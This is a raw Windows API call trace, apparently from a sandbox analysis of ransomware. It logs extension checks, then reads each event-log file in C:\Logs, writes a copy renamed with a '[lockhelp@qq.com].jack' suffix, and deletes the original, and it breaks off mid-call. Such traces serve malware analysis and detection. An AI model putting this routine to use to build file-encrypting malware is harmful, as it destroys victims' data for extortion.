1 [0208.793] lstrlenW (lpString=".ppt") returned 4 [0208.793] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0208.793] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx") returned 59 [0208.793] lstrlenW (lpString=".zip") returned 4 [0208.793] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0208.793] lstrlenW (lpString=".rar") returned 4 [0208.794] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0208.794] lstrlenW (lpString=".bz2") returned 4 [0208.794] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0208.794] lstrlenW (lpString=".7z") returned 3 [0208.794] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0208.794] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx") returned 59 [0208.794] lstrlenW (lpString=".dbf") returned 4 [0208.794] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0208.794] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx") returned 59 [0208.794] lstrlenW (lpString=".1cd") returned 4 [0208.794] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0208.794] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx") returned 59 [0208.794] lstrlenW (lpString=".jpg") returned 4 [0208.794] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0208.794] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx") returned 59 [0208.794] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx") returned 59 [0208.794] lstrlenW (lpString=".doc") returned 4 [0208.794] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0208.794] lstrlenW (lpString=".docx") returned 5 [0208.794] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0208.794] lstrlenW (lpString=".pdf") returned 4 [0208.794] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0208.794] lstrlenW (lpString=".xls") returned 4 [0208.794] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0208.794] lstrlenW (lpString=".xlsx") returned 5 [0208.794] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0208.794] lstrlenW (lpString=".ppt") returned 4 [0208.794] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0208.795] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx") returned 59 [0208.795] lstrlenW (lpString=".zip") returned 4 [0208.795] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0208.795] lstrlenW (lpString=".rar") returned 4 [0208.795] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0208.795] lstrlenW (lpString=".bz2") returned 4 [0208.795] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0208.795] lstrlenW (lpString=".7z") returned 3 [0208.795] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0208.795] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx") returned 59 [0208.795] lstrlenW (lpString=".dbf") returned 4 [0208.795] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0208.795] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx") returned 59 [0208.795] lstrlenW (lpString=".1cd") returned 4 [0208.795] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0208.795] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx") returned 59 [0208.795] lstrlenW (lpString=".jpg") returned 4 [0208.795] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0208.795] lstrcmpiW (lpString1=".evtx", lpString2=".jack") returned -1 [0208.795] lstrlenW (lpString="Microsoft-Windows-Kernel-EventTracing%4Admin.evtx") returned 49 [0208.795] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-EventTracing%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-eventtracing%4admin.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x420 [0208.796] GetFileSizeEx (in: hFile=0x420, lpFileSize=0x32dff14 | out: lpFileSize=0x32dff14*=69632) returned 1 [0208.796] CloseHandle (hObject=0x420) returned 1 [0208.796] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-EventTracing%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-eventtracing%4admin.evtx")) returned 0x20 [0208.796] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-EventTracing%4Admin.evtx.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\logs\\microsoft-windows-kernel-eventtracing%4admin.evtx.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0208.796] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-EventTracing%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-eventtracing%4admin.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x420 [0208.796] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32dfec0 | out: lpNewFilePointer=0x0) returned 1 [0208.796] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32dfec0 | out: lpNewFilePointer=0x0) returned 1 [0208.796] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-EventTracing%4Admin.evtx.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\logs\\microsoft-windows-kernel-eventtracing%4admin.evtx.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x41c [0208.797] GetLastError () returned 0x0 [0208.797] ReadFile (in: hFile=0x420, lpBuffer=0x3dff020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x32dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3dff020*, lpNumberOfBytesRead=0x32dfecc*=0x11000, lpOverlapped=0x0) returned 1 [0208.800] WriteFile (in: hFile=0x41c, lpBuffer=0x3dff020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x32dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3dff020*, lpNumberOfBytesWritten=0x32dfc94*=0x11010, lpOverlapped=0x0) returned 1 [0208.802] ReadFile (in: hFile=0x420, lpBuffer=0x3dff020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x32dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3dff020*, lpNumberOfBytesRead=0x32dfecc*=0x0, lpOverlapped=0x0) returned 1 [0208.802] WriteFile (in: hFile=0x41c, lpBuffer=0x3dff020*, nNumberOfBytesToWrite=0x136, lpNumberOfBytesWritten=0x32dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3dff020*, lpNumberOfBytesWritten=0x32dfc94*=0x136, lpOverlapped=0x0) returned 1 [0208.802] SetEndOfFile (hFile=0x41c) returned 1 [0208.802] CloseHandle (hObject=0x41c) returned 1 [0208.804] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32dfec0 | out: lpNewFilePointer=0x0) returned 1 [0208.805] SetEndOfFile (hFile=0x420) returned 1 [0208.806] CloseHandle (hObject=0x420) returned 1 [0208.806] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-EventTracing%4Admin.evtx.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x20) returned 1 [0208.806] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-EventTracing%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-eventtracing%4admin.evtx")) returned 1 [0208.807] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-EventTracing%4Admin.evtx") returned 57 [0208.807] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-EventTracing%4Admin.evtx") returned 57 [0208.807] lstrlenW (lpString=".doc") returned 4 [0208.807] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0208.807] lstrlenW (lpString=".docx") returned 5 [0208.807] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0208.807] lstrlenW (lpString=".pdf") returned 4 [0208.807] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0208.807] lstrlenW (lpString=".xls") returned 4 [0208.807] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0208.807] lstrlenW (lpString=".xlsx") returned 5 [0208.807] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0208.807] lstrlenW (lpString=".ppt") returned 4 [0208.807] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0208.807] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-EventTracing%4Admin.evtx") returned 57 [0208.807] lstrlenW (lpString=".zip") returned 4 [0208.807] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0208.807] lstrlenW (lpString=".rar") returned 4 [0208.807] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0208.807] lstrlenW (lpString=".bz2") returned 4 [0208.807] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0208.807] lstrlenW (lpString=".7z") returned 3 [0208.807] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0208.807] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-EventTracing%4Admin.evtx") returned 57 [0208.807] lstrlenW (lpString=".dbf") returned 4 [0208.808] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0208.808] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-EventTracing%4Admin.evtx") returned 57 [0208.808] lstrlenW (lpString=".1cd") returned 4 [0208.808] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0208.808] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-EventTracing%4Admin.evtx") returned 57 [0208.808] lstrlenW (lpString=".jpg") returned 4 [0208.808] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0208.808] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-EventTracing%4Admin.evtx") returned 57 [0208.808] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-EventTracing%4Admin.evtx") returned 57 [0208.808] lstrlenW (lpString=".doc") returned 4 [0208.808] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0208.808] lstrlenW (lpString=".docx") returned 5 [0208.808] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0208.808] lstrlenW (lpString=".pdf") returned 4 [0208.808] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0208.808] lstrlenW (lpString=".xls") returned 4 [0208.808] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0208.808] lstrlenW (lpString=".xlsx") returned 5 [0208.808] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0208.808] lstrlenW (lpString=".ppt") returned 4 [0208.808] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0208.808] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-EventTracing%4Admin.evtx") returned 57 [0208.808] lstrlenW (lpString=".zip") returned 4 [0208.808] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0208.808] lstrlenW (lpString=".rar") returned 4 [0208.808] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0208.808] lstrlenW (lpString=".bz2") returned 4 [0208.808] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0208.809] lstrlenW (lpString=".7z") returned 3 [0208.809] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0208.809] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-EventTracing%4Admin.evtx") returned 57 [0208.809] lstrlenW (lpString=".dbf") returned 4 [0208.809] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0208.809] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-EventTracing%4Admin.evtx") returned 57 [0208.809] lstrlenW (lpString=".1cd") returned 4 [0208.809] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0208.809] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-EventTracing%4Admin.evtx") returned 57 [0208.809] lstrlenW (lpString=".jpg") returned 4 [0208.809] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0208.809] lstrcmpiW (lpString1=".evtx", lpString2=".jack") returned -1 [0208.809] lstrlenW (lpString="Microsoft-Windows-Kernel-PnP%4Configuration.evtx") returned 48 [0208.809] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-PnP%4Configuration.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-pnp%4configuration.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x420 [0208.809] GetFileSizeEx (in: hFile=0x420, lpFileSize=0x32dff14 | out: lpFileSize=0x32dff14*=1052672) returned 1 [0208.809] CloseHandle (hObject=0x420) returned 1 [0208.810] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-PnP%4Configuration.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-pnp%4configuration.evtx")) returned 0x20 [0208.810] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-PnP%4Configuration.evtx.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\logs\\microsoft-windows-kernel-pnp%4configuration.evtx.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0208.810] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-PnP%4Configuration.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-pnp%4configuration.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x420 [0208.810] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32dfec0 | out: lpNewFilePointer=0x0) returned 1 [0208.810] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32dfec0 | out: lpNewFilePointer=0x0) returned 1 [0208.810] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-PnP%4Configuration.evtx.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\logs\\microsoft-windows-kernel-pnp%4configuration.evtx.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x41c [0208.810] GetLastError () returned 0x0 [0208.810] ReadFile (in: hFile=0x420, lpBuffer=0x3dff020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x32dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3dff020*, lpNumberOfBytesRead=0x32dfecc*=0xffff0, lpOverlapped=0x0) returned 1 [0208.893] WriteFile (in: hFile=0x41c, lpBuffer=0x3dff020*, nNumberOfBytesToWrite=0xffff0, lpNumberOfBytesWritten=0x32dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3dff020*, lpNumberOfBytesWritten=0x32dfc94*=0xffff0, lpOverlapped=0x0) returned 1 [0209.414] ReadFile (in: hFile=0x420, lpBuffer=0x3dff020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x32dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3dff020*, lpNumberOfBytesRead=0x32dfecc*=0x1010, lpOverlapped=0x0) returned 1 [0209.423] WriteFile (in: hFile=0x41c, lpBuffer=0x3dff020*, nNumberOfBytesToWrite=0x1020, lpNumberOfBytesWritten=0x32dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3dff020*, lpNumberOfBytesWritten=0x32dfc94*=0x1020, lpOverlapped=0x0) returned 1 [0209.427] ReadFile (in: hFile=0x420, lpBuffer=0x3dff020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x32dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3dff020*, lpNumberOfBytesRead=0x32dfecc*=0x0, lpOverlapped=0x0) returned 1 [0209.427] WriteFile (in: hFile=0x41c, lpBuffer=0x3dff020*, nNumberOfBytesToWrite=0x134, lpNumberOfBytesWritten=0x32dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3dff020*, lpNumberOfBytesWritten=0x32dfc94*=0x134, lpOverlapped=0x0) returned 1 [0209.427] SetEndOfFile (hFile=0x41c) returned 1 [0209.427] CloseHandle (hObject=0x41c) returned 1 [0209.492] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32dfec0 | out: lpNewFilePointer=0x0) returned 1 [0209.492] SetEndOfFile (hFile=0x420) returned 1 [0209.494] CloseHandle (hObject=0x420) returned 1 [0209.494] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-PnP%4Configuration.evtx.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x20) returned 1 [0209.494] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-PnP%4Configuration.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-pnp%4configuration.evtx")) returned 1 [0209.521] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-PnP%4Configuration.evtx") returned 56 [0209.521] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-PnP%4Configuration.evtx") returned 56 [0209.521] lstrlenW (lpString=".doc") returned 4 [0209.521] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0209.521] lstrlenW (lpString=".docx") returned 5 [0209.521] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0209.521] lstrlenW (lpString=".pdf") returned 4 [0209.521] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0209.521] lstrlenW (lpString=".xls") returned 4 [0209.521] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0209.521] lstrlenW (lpString=".xlsx") returned 5 [0209.521] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0209.521] lstrlenW (lpString=".ppt") returned 4 [0209.522] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0209.522] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-PnP%4Configuration.evtx") returned 56 [0209.522] lstrlenW (lpString=".zip") returned 4 [0209.522] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0209.522] lstrlenW (lpString=".rar") returned 4 [0209.522] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0209.522] lstrlenW (lpString=".bz2") returned 4 [0209.522] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0209.522] lstrlenW (lpString=".7z") returned 3 [0209.522] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0209.522] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-PnP%4Configuration.evtx") returned 56 [0209.522] lstrlenW (lpString=".dbf") returned 4 [0209.522] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0209.522] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-PnP%4Configuration.evtx") returned 56 [0209.522] lstrlenW (lpString=".1cd") returned 4 [0209.522] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0209.522] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-PnP%4Configuration.evtx") returned 56 [0209.522] lstrlenW (lpString=".jpg") returned 4 [0209.522] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0209.522] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-PnP%4Configuration.evtx") returned 56 [0209.522] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-PnP%4Configuration.evtx") returned 56 [0209.522] lstrlenW (lpString=".doc") returned 4 [0209.522] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0209.522] lstrlenW (lpString=".docx") returned 5 [0209.522] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0209.522] lstrlenW (lpString=".pdf") returned 4 [0209.522] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0209.523] lstrlenW (lpString=".xls") returned 4 [0209.523] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0209.523] lstrlenW (lpString=".xlsx") returned 5 [0209.523] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0209.523] lstrlenW (lpString=".ppt") returned 4 [0209.523] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0209.523] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-PnP%4Configuration.evtx") returned 56 [0209.523] lstrlenW (lpString=".zip") returned 4 [0209.523] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0209.523] lstrlenW (lpString=".rar") returned 4 [0209.523] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0209.523] lstrlenW (lpString=".bz2") returned 4 [0209.523] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0209.523] lstrlenW (lpString=".7z") returned 3 [0209.523] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0209.523] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-PnP%4Configuration.evtx") returned 56 [0209.523] lstrlenW (lpString=".dbf") returned 4 [0209.523] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0209.523] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-PnP%4Configuration.evtx") returned 56 [0209.523] lstrlenW (lpString=".1cd") returned 4 [0209.523] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0209.523] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-PnP%4Configuration.evtx") returned 56 [0209.523] lstrlenW (lpString=".jpg") returned 4 [0209.523] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0209.524] lstrcmpiW (lpString1=".evtx", lpString2=".jack") returned -1 [0209.524] lstrlenW (lpString="Microsoft-Windows-Kernel-WHEA%4Operational.evtx") returned 47 [0209.524] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-whea%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x41c [0209.532] GetFileSizeEx (in: hFile=0x41c, lpFileSize=0x32dff14 | out: lpFileSize=0x32dff14*=69632) returned 1 [0209.532] CloseHandle (hObject=0x41c) returned 1 [0209.532] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-whea%4operational.evtx")) returned 0x20 [0209.533] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Operational.evtx.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\logs\\microsoft-windows-kernel-whea%4operational.evtx.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0209.533] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-whea%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x41c [0209.533] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32dfec0 | out: lpNewFilePointer=0x0) returned 1 [0209.533] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32dfec0 | out: lpNewFilePointer=0x0) returned 1 [0209.533] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Operational.evtx.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\logs\\microsoft-windows-kernel-whea%4operational.evtx.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x44c [0209.537] GetLastError () returned 0x0 [0209.537] ReadFile (in: hFile=0x41c, lpBuffer=0x3dff020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x32dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3dff020*, lpNumberOfBytesRead=0x32dfecc*=0x11000, lpOverlapped=0x0) returned 1 [0209.545] WriteFile (in: hFile=0x44c, lpBuffer=0x3dff020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x32dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3dff020*, lpNumberOfBytesWritten=0x32dfc94*=0x11010, lpOverlapped=0x0) returned 1 [0209.547] ReadFile (in: hFile=0x41c, lpBuffer=0x3dff020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x32dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3dff020*, lpNumberOfBytesRead=0x32dfecc*=0x0, lpOverlapped=0x0) returned 1 [0209.547] WriteFile (in: hFile=0x44c, lpBuffer=0x3dff020*, nNumberOfBytesToWrite=0x132, lpNumberOfBytesWritten=0x32dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3dff020*, lpNumberOfBytesWritten=0x32dfc94*=0x132, lpOverlapped=0x0) returned 1 [0209.548] SetEndOfFile (hFile=0x44c) returned 1 [0209.574] CloseHandle (hObject=0x44c) returned 1 [0209.577] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32dfec0 | out: lpNewFilePointer=0x0) returned 1 [0209.577] SetEndOfFile (hFile=0x41c) returned 1 [0209.587] CloseHandle (hObject=0x41c) returned 1 [0209.596] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Operational.evtx.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x20) returned 1 [0209.597] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-whea%4operational.evtx")) returned 1 [0209.597] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Operational.evtx") returned 55 [0209.597] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Operational.evtx") returned 55 [0209.597] lstrlenW (lpString=".doc") returned 4 [0209.597] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0209.597] lstrlenW (lpString=".docx") returned 5 [0209.597] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0209.597] lstrlenW (lpString=".pdf") returned 4 [0209.598] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0209.598] lstrlenW (lpString=".xls") returned 4 [0209.598] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0209.598] lstrlenW (lpString=".xlsx") returned 5 [0209.598] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0209.598] lstrlenW (lpString=".ppt") returned 4 [0209.598] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0209.598] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Operational.evtx") returned 55 [0209.598] lstrlenW (lpString=".zip") returned 4 [0209.598] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0209.598] lstrlenW (lpString=".rar") returned 4 [0209.598] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0209.598] lstrlenW (lpString=".bz2") returned 4 [0209.598] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0209.598] lstrlenW (lpString=".7z") returned 3 [0209.598] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0209.598] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Operational.evtx") returned 55 [0209.598] lstrlenW (lpString=".dbf") returned 4 [0209.598] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0209.598] lstrlenW 